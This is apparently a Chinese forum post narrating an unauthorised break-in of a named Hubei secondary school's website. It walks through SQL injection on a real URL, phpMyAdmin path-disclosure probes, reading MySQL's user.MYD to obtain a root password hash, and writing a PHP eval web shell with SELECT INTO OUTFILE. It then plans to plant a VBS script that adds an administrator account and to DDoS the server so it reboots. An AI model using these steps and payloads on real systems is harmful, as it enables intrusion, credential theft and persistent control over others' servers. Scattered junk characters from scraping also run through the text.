友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！



" G/ @; m* V' f8 R& R; ^常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限

+ _  A0 C% Y# P* o1 F2 J那么想可以直接写入shell ，getshell有几个条件：
% k8 }+ `( F" O3 y7 u" n

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF

% n. S5 n# ^/ \# p+ t试着爆绝对路径：
) o: B% Y& D  [+ n* D# T9 u1./phpMyAdmin/index.php?lang[]=1  
7 M6 J$ k$ `+ p% L2./phpMyAdmin/phpinfo.php  
3./load_file()  
7 j, W0 d( l8 j' d  L0 x; k4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

均不行...........................

& y" D, {+ T( O; R2 W御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php

9 z! F0 j2 C) v4 f- ^: d权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin
0 ^2 F$ y( v- v, l- G' t# q
2 _$ |: L6 t  P7 r默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

) c1 T0 A2 D; K7 o1 Y敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........

想想root还可以读，读到root密码进phpmyadmin 也可以拿shell

0 S+ p$ k  {1 G/ s0 C% ghttp://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

2 b6 ^& E1 n, ?; k5 Q# d) G成功读到root密码：

17---- r(0072)
' r- W; c/ }) c  V* p* L; q18---- o(006f)
* y8 p% b. ^7 b6 E9 |( M19---- o(006f)
, H$ s& `/ x! y" ^20---- t(0074)
1 Y0 I* i5 r1 O2 C, t" N: G/ R21---- *(002a)
22---- 8(0038)
2 U$ u' q8 S) L23---- 2(0032)
24---- E(0045)
25---- 1(0031)
26---- C(0043)
27---- 5(0035)
28---- 8(0038)
29---- 2(0032)
/ P- o: H1 W/ W1 |30---- 8(0038)
/ n7 ^) Q; U/ C1 }2 Q3 O6 c$ c. l3 a31---- A(0041)
- A' j1 F3 a* R/ h7 R8 G+ n8 k0 D32---- 9(0039)
8 X  z$ V% w9 ~- O33---- B(0042)
- g6 n6 {4 Q( w4 Q, P% {+ z8 `34---- 5(0035)
) m. o* e% ^# o0 H) k; ~' ~35---- 4(0034)
36---- 8(0038)
37---- 6(0036)
38---- 4(0034)
39---- 9(0039)
40---- 1(0031)
8 R2 @0 P* }% Y% h+ |" N! l41---- 1(0031)
42---- 5(0035)
# Z$ k7 Y" Z- _5 d4 N6 T43---- 3(0033)
44---- 5(0035)
, i3 z# z; B1 I45---- 9(0039)
* [- P$ I  K7 O0 H  U( Q46---- 8(0038)
47---- F(0046)
3 K1 F& l9 B. m: V48---- F(0046)
! e' I* d! J) x! m/ K+ u49---- 4(0034)
50---- F(0046)
51---- 0(0030)
* Q- g  |5 t: v52---- 3(0033)
53---- 2(0032)
54---- A(0041)
55---- 4(0034)
, y/ d: O) s. V  p2 k( q56---- A(0041)
) X( h$ Z$ C  @4 F1 a; R" {9 ^/ {57---- B(0042)
58---- *(0044)
9 ~# H* k/ _+ y. j/ _! t* Q. _! ]% u59---- *(0035)
60---- *(0041)
3 O3 ~: o0 E8 ~+ V61---- *0032)

. \+ }6 b6 z; c2 v解密后成功登陆phpmyamin
                          
9 F' |1 `5 c( h' j. N; }
  [- r# h4 N- o: w                             
  r" F+ c- s. ]: b0 L: V( a
$ g9 E* q: z, Y6 Q找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
/ B; l6 Q5 ~" F! j# x/ [
成功执行，拿下shell，菜刀连接：
& ]! f4 R8 f0 ^* z7 @. K
服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：
+ N8 r1 t5 ^( v. Y" B3 ?- O

服务器上已经有个隐藏帐号了

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

  h0 i# V& L$ S5 d1 G' a

成员

-------------------------------------------------------------------------------
admin
0 K  y: c; W" ^* n/ m. `Administrator
slipper$
sqluser
命令成功完成。

. |. O# O  ]! x" d2 K; s1 {服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。

: {% ~5 o* ?9 l  m& }8 fddos服务器重启，不然就只能坐等服务器重启了...............................
* _, s! t& P' [; J
      

$ n* T# j8 P, [

angel